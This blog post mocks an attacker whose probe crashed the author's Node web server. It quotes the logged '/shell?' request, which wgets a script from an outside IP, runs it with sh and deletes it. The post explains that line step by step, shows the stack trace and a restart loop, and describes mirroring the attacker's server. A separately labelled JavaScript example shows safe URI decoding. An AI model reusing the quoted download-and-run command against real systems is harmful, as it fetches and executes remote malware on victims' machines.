
2018-07-25

GRATZ!!!... finally... :)

lol: "first to the key"... thank you, you also earned this post and a report to the cops (for the sake of my children, sorry... at least you get to learn... hopefully to hack better, and for better goals :) ::: someone sent something stupid enough to stop our server in its tracks... ("stupid enough": the backend is definitely not sh)... nor are URIs used for code evaluation... but the server broke anyway because of parsing... oops, forgot to catch that exception... aka: dare not presume that you were smart at all... we do use a bash netcat http server for local use... that, by the way, would not come down with this kind of URI... but definitely ::: very nice for future testing, these hacking requests that you send...

2216 ::ffff:156.197.132.62 8080 undefined /shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo

Stopping all running ...

Exiting: URIError: URI malformed
    at decodeURIComponent ()
    at splitAndDecode (eval at (54:1), :123:24)
    at KeepItSimple.handler (eval at (54:1), :147:24)

... so it is just the parsing that is not ignoring enough... now ::: please retry only in the next version, it will take long... and spare us manual server restarts... nah... better we go with a temporary fix:

  while : ; do http-server ; done ;
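
An added example, not this blog's server code: `decodeURIComponent` throws `URIError` on the malformed `%+` escape in `sh%+lwodo`, so catching it per request and answering 400 keeps the process up without the restart loop. The names `safeDecode`, `splitAndDecodeSafe`, `handle` and the `ROUTES` set are hypothetical.

```javascript
// Added example with hypothetical names; not the blog's server code.
// Constructed sample: the request target copied from the log line above.
const SAMPLE = '/shell?cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo';

// Decode one URI component; return null instead of throwing on bad escapes.
function safeDecode(part, plusAsSpace = false) {
  try {
    return decodeURIComponent(plusAsSpace ? part.replace(/\+/g, ' ') : part);
  } catch (err) {
    if (err instanceof URIError) return null; // e.g. "%+" or a lone "%"
    throw err;                                // anything else is a real bug
  }
}

// Split a request target into a decoded path and decoded query pairs.
// Returns null as soon as any piece is malformed.
function splitAndDecodeSafe(target) {
  const q = target.indexOf('?');
  const path = safeDecode(q === -1 ? target : target.slice(0, q));
  if (path === null) return null;
  const query = [];
  const raw = q === -1 ? '' : target.slice(q + 1);
  for (const pair of raw.split('&')) {
    if (pair === '') continue;
    const eq = pair.indexOf('=');
    const key = safeDecode(eq === -1 ? pair : pair.slice(0, eq), true);
    const value = eq === -1 ? '' : safeDecode(pair.slice(eq + 1), true);
    if (key === null || value === null) return null;
    query.push([key, value]);
  }
  return { path, query };
}

// Assumed routes; nothing here ever evaluates the query as a command.
const ROUTES = new Set(['/', '/index.html']);

// Pure routing decision: malformed input costs this one request a 400,
// an unknown path gets a 404, and the process keeps running either way.
function handle(target) {
  const parsed = splitAndDecodeSafe(target);
  if (parsed === null) return { status: 400, body: 'Bad Request' };
  if (!ROUTES.has(parsed.path)) return { status: 404, body: 'Not Found' };
  return { status: 200, body: 'ok' };
}
```

Call `handle(req.url)` from the request listener and write the returned status; logging the 400s keeps these probes visible without taking the site down.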

... yes ::: give us your IPs...

... now.... let's read this want-to-be-hacker simple line:

  `undefined' : as if we have that virtual host
  `/shell' : as if we match this path or at all evaluate shell commands sent in this uri query part as such
    `cd+/tmp;cd+/var;wget+http://199.195.254.118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo'

... so the children can understand...

go to /tmp (and do nothing?... lol...) ; go to /var ; connect to the hacker and download his script `jaws' as `wodo' (lol: trying to scare someone?) ; run it with sh ; and then remove it... lol... where do you hire these noobs!... i don't want to know...

... so... we... lol... rofl... muah... ahahahahhahahah...
we hacked back... and stole all their hacking scripts...
using the commands :

# we are actually using /tmp for these events... lol...
cd /tmp
# using the anonymous tor network
# export http_proxy=socks5://localhost:9050
# oops : wget does not support socks5, curl does... but not now
# download all their files
wget --recursive \
     --no-clobber \
     --page-requisites \
     --html-extension \
     --convert-links \
     --no-parent \
     199.195.254.118

how nice of them to leave them publicly available... and tell us about it... poor incompetents from (or sucking) boston... :( ... they are now still wondering why their hack is not recalling... yet our site is down... :( ... so confusing for them... so i come here and explain to the little children and hackers...

bonus ::: the screenshots of the hackers' site... that also use Debian... (nice start)... now ::: go help your neighbors to migrate from windows... please... ip's in the scripts... ???... cd /tmp for nothing?... `jaws'?... `wodo'?... have you rather met jesus... master of the word... duh!... he codes better... you should know him better ::: thou swords are only useless and shameful.

you made the wall ::: have fun...